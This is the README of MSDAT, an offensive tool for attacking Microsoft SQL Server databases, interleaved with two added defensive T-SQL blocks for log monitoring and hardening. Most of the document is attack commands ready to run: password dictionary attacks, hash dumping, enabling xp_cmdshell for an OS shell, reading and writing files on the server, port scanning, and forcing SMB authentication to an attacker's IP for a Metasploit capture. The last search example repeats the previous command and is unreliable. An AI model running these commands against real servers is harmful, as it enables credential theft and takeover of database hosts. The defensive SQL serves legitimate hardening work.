MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL databases remotely.
Usage examples of MSDAT:
- You have a Microsoft SQL database listening remotely and you want to find valid credentials in order to connect to the database
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)
Tested on Microsoft SQL Server 2005, 2008 and 2012.
Changelog
- Version 1.0 (2017/02/15):
  - first version released
Features
Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (ex: database version) about a MSSQL database without being authenticated
- search MSSQL accounts with a dictionary attack
- test each login as password (authentication required)
- get a Windows shell on the database server with:
  - xp_cmdshell
- download files remotely with:
  - OLE Automation
  - bulkinsert
  - openrowset
- upload files on the server with:
  - OLE Automation
  - openrowset
- capture a SMB authentication thanks to:
  - bulkinsert
  - openrowset
  - xp_dirtree
  - xp_fileexist
  - xp_getfiledetails
- steal MSSQL hashed passwords, on any MSSQL version
- scan ports through the database with:
  - openrowset
- execute SQL requests on a remote MSSQL server through the database (target) with:
  - bulkinsert
  - openrowset
- list files/directories with:
  - xp_subdirs
  - xp_dirtree
- list drives/media with:
  - xp_fixeddrives
  - xp_availablemedia
- create a folder with:
  - xp_create_subdir
Installation
Some dependencies must be installed in order to run MSDAT.
On Ubuntu:
```bash
sudo apt-get install freetds-dev
sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete
```
Then set the TDS protocol version and NTLMv2 in the FreeTDS configuration file (freetds.conf, typically /etc/freetds/freetds.conf on Ubuntu) so that pymssql can talk to recent MSSQL servers:
```
[global]
# TDS protocol version
tds version = 8.0
use ntlmv2 = yes
```
Examples
Modules
- You can list all modules:
```bash
./msdat.py -h
```
- When you have chosen a module (example: all), you can use it and list all features and options of the module:
```bash
./msdat.py all -h
```
all module
The all module allows you to run all modules (depending on the options you have chosen):
```bash
python msdat.py all -s $SERVER
```
Useful options:
- --accounts-file: use your own account file for the dictionary attack
- --force-retry: try multiple passwords for a user without asking you
- --login-timeout: define your own timeout value
```bash
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry
```
mssqlinfo module
To get technical information about a remote MSSQL server without being authenticated:
```bash
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info
```
passwordguesser module
This module allows you to search for valid credentials:
```bash
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search
```
You can specify your own account file with the --accounts-file option:
```bash
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry
```
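From the defender's side, a dictionary attack like the one above leaves a burst of "Login failed" events in the SQL Server error log. The following T-SQL is an added example, not part of MSDAT: it reads the current error log with xp_readerrorlog and groups the failures by client address, assuming the default login auditing setting (failed logins are logged) and a login allowed to run xp_readerrorlog; the threshold of 20 failures per hour is an assumed starting point.

```sql
-- Added example (not from MSDAT): spot a password-guessing burst in the error log.
-- Assumes failed logins are audited (the default) and sysadmin/securityadmin rights.
CREATE TABLE #errlog (
    LogDate     datetime,
    ProcessInfo nvarchar(64),
    [Text]      nvarchar(max)
);

-- Current error log (0) of the database engine (1), filtered on failed logins.
INSERT INTO #errlog (LogDate, ProcessInfo, [Text])
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed';

-- Each entry ends with the source, e.g. "... [CLIENT: 10.0.0.5]"; pull it out once
-- with CROSS APPLY ('[CLIENT: ' is 9 characters long) and aggregate per client.
SELECT c.client,
       COUNT(*)       AS failures,
       MIN(e.LogDate) AS first_seen,
       MAX(e.LogDate) AS last_seen
FROM #errlog AS e
CROSS APPLY (
    SELECT SUBSTRING(e.[Text],
                     CHARINDEX('[CLIENT: ', e.[Text]) + 9,
                     CHARINDEX(']', e.[Text], CHARINDEX('[CLIENT: ', e.[Text]))
                       - CHARINDEX('[CLIENT: ', e.[Text]) - 9) AS client
) AS c
WHERE e.LogDate >= DATEADD(hour, -1, GETDATE())
  AND CHARINDEX('[CLIENT: ', e.[Text]) > 0
GROUP BY c.client
HAVING COUNT(*) >= 20          -- assumed threshold; tune to your environment
ORDER BY failures DESC;

DROP TABLE #errlog;
```

Many failures for many different login names from one client in a short window is the signature of an account dictionary attack rather than a user mistyping a password.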
passwordstealer module
To dump hashed passwords:
```bash
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt
```
xpcmdshell module
To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):
```bash
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
```
If xp_cmdshell is not enabled, the --enable-xpcmdshell option can be used in this module to activate it:
```bash
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --shell
```
The --disable-xpcmdshell option disables xp_cmdshell again afterwards if it was enabled.
smbauthcapture module
Thanks to this module, you can capture a SMB authentication:
```bash
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE
```
```
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit
```
To choose which procedure is used to trigger the SMB authentication:
```bash
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1
```
oleautomation module
This module can be used to read/write files on the database server.
The following command reads the file temp.txt stored on the database server:
```bash
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
```
To write a file on the server, download a remote file to a local one, or upload a local file to the server:
```bash
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt'
```
bulkopen module
The module bulkopen can be used:
- to read/download files stored on a database server
- to scan ports through the database server
- to execute SQL requests on a remote MSSQL server through the database
To read a file stored on the database server:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
```
The method can be chosen with the --method option:
- bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or
- openrowset (https://msdn.microsoft.com/en-us/library/ms190312.aspx):
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset
```
This module can also be used to scan ports (here 1433 and 1434 of 127.0.0.1) through the database server:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v
```
You can scan a range of ports:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438
```
To execute a SQL request on a remote MSSQL server ($SERVER2) through the database:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'
```
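The xpcmdshell, oleautomation and bulkopen modules above all depend on server-level settings and permissions that a DBA can audit and lock down. The following T-SQL is an added example, not part of MSDAT: it reports the surface-area options these modules rely on, the grants that let non-sysadmins use bulk operations or xp_cmdshell, and then shows the statements that disable the options. It assumes a sysadmin-equivalent login on the instance being reviewed.

```sql
-- Added example (not from MSDAT): audit and harden the settings the modules use.
-- 1. Surface-area options: value_in_use = 1 means the feature is available.
--    xp_cmdshell               -> xpcmdshell module
--    Ole Automation Procedures -> oleautomation module
--    Ad Hoc Distributed Queries -> OPENROWSET against remote hosts (scan-ports, request-rdb)
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');

-- 2. Who can re-enable them: sysadmin members can always run sp_configure,
--    so review this list as carefully as the options themselves.
SELECT m.name AS member_login
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. Non-sysadmin logins that were granted BULK INSERT / OPENROWSET(BULK ...) rights.
SELECT p.name AS grantee, sp.permission_name, sp.state_desc
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS p ON p.principal_id = sp.grantee_principal_id
WHERE sp.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 4. A proxy credential lets non-sysadmins run xp_cmdshell once EXECUTE is granted;
--    its presence is a finding unless it is documented.
SELECT name, credential_identity
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 5. Hardening: turn the options off when nothing legitimate needs them.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
```

Note that xp_dirtree, xp_fileexist and the other directory procedures used by the smbauthcapture and xpdirectory modules cannot be disabled with sp_configure; the usual mitigations there are keeping the login out of sysadmin and blocking outbound SMB (TCP 445) from the database host.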
xpdirectory module
The module xpdirectory can be used:
- to list:
  - files
  - directories
  - drives
- to check if a file exists
- to create a directory
```bash
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'
```
search module
The module search can be used to search for a pattern in the column names of tables and views. Useful to search for the pattern %password% in column names, for example.
To get column names which contain password patterns (ex: passwd, password, motdepasse, clave):
```bash
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
```
To search for a specific pattern in the column names of views and tables:
```bash
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
```